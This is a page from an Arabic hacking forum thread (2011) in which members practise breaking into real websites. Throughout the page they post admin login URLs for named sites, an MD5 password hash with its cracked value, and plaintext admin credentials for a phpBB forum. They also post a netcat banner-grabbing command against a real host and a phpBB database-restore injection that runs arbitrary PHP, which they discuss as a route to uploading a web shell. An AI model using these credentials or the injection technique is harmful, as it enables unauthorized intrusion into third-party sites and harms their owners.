:: vBspiders Professional Network :: - [تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)

صفحة 5 من 20

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)

- - [تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :) (http://www.vbspiders.com/vb/showthread.php?t=50558)

tenshu2011

07-04-2011 02:20 AM

أكيي أعني بها أرفع الشال

bleu moon

07-04-2011 02:20 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة tenshu2011 (المشاركة 348767)

أكييييييييييي ;)
لم أفهم كيفية رفع الشال
اذا كنت تعرف أبعتلي كيف

عندي مواقع أخرى :angel:

اووك لو رفع معي :) بعمل لك شرح بالصوت :mdr:

tenshu2011

07-04-2011 02:34 AM

أكي في الانتظار :D

tenshu2011

07-04-2011 02:36 AM

هل عملت بنظام اللينوكس ؟

أفضل الأدوات لحقن قاعدة البيانات هي sqlninja

لكن تأخذ وقت طويل حسب سرعة النات

;)

bleu moon

07-04-2011 02:41 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة tenshu2011 (المشاركة 348774)

هل عملت بنظام اللينوكس ؟

أفضل الأدوات لحقن قاعدة البيانات هي sqlninja

لكن تأخذ وقت طويل حسب سرعة النات

;)

لا :ouch:

bleu moon

07-04-2011 02:50 AM

الباس غلط :(
http://rhythmsystem.2pointproject.com/admin/

tenshu2011

07-04-2011 02:54 AM

للأسف

أنا أستعمل اللينوكس باك تراك 5

كل أدوات الهاكر موجودة ^^

أنصحك به ..........

رأيت تعليقك حول معرفة السرفر في أحد المواضيع

سهلة جدا باستعمال netcat

netcat -v rhythmsystem.2pointproject.com 80

ثم

HEAD / HTTP/1.0

ثم ENTER مرتين

المثال

root@bt:~# netcat -v rhythmsystem.2pointproject.com 80
DNS fwd/rev mismatch: rhythmsystem.2pointproject.com != 2pointsource.com
rhythmsystem.2pointproject.com [216.227.208.44] 80 (www) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 5558
Content-Type: text/html
Content-Location: http://216.227.208.44/Index.html
Last-Modified: Thu, 29 Apr 2010 18:35:38 GMT
Accept-Ranges: bytes
ETag: "a88daac3cae7ca1:14855"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 03 Jul 2011 23:21:31 GMT
Connection: close

bleu moon

07-04-2011 03:01 AM

pass : 57ff5847af65e833fb68e1cd05f063c9
user : admin

http://rhythmsystem.2pointproject.com/admin

bleu moon

07-04-2011 03:02 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة tenshu2011 (المشاركة 348779)

مافهمت ولا حاجه هههههههه :grrrrrr:
ذي معلومات للسيرفر فقط :) ؟

tenshu2011

07-04-2011 03:08 AM

نعم للسرفر
من أين حصلت على الباس المشفرة ؟
هل فكيت التشفير

tenshu2011

07-04-2011 03:16 AM

الباس المشفة ليست صالحة

هذا الفك
c3d3rrun

tenshu2011

07-04-2011 03:34 AM

اعادة تشفيرها

http://schwett.com/md5/index.php?md5...md5c=MD5+Krypt

نفس النتيجة

SpookWeb

07-04-2011 03:45 AM

السيرفر راح يسببلي الجنوووووون :mad:

وسيلة لحد هنا:

http://www.cheela.org/cheelfor
http://www.cheela.org/cheelfor/admin
phpBB forum
username: vbondoux
he's admin...
pass: sZCnYyk8

جربت كتير, ماقدرت الاقي وسيلة لرفع الشيل. بس في طريقة غير...

تخلق فيل تسميه "Shell.sql" أو آية شي تاني... بس يكون sql.وتحت داخيلو

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo());' WHERE user_id=2;

وبعدها تعمل restore database من لوحة التحكم الادمن.

وفي تعديل ال profile نرى أن معلومات ال php ظهرت. يعني بالكود نبدل phpinfo() بـأي كود php تاني ويمشي. بس أنا مااعرف اش......... وللصراحة يئست منيل phpBB ورايح الدور على ثغرة تانية بـنفس الموقع.

tenshu2011

07-04-2011 03:53 AM

الحمد لله أنك استفدت من فك التشفير

مشكلتي أني لا أعرف رفع الشال اذا لم أجد الأبلود
أو تحديد مكانه في url

bleu moon

07-04-2011 05:32 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة tenshu2011 (المشاركة 348782)

نعم للسرفر
من أين حصلت على الباس المشفرة ؟
هل فكيت التشفير

لا
كنت بصمم آندكس هه

الساعة الآن 11:35 PM

صفحة 5 من 20

« الأولى

الأخيرة »

عرض 40 مشاركات من هذا الموضوع لكل صفحة

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0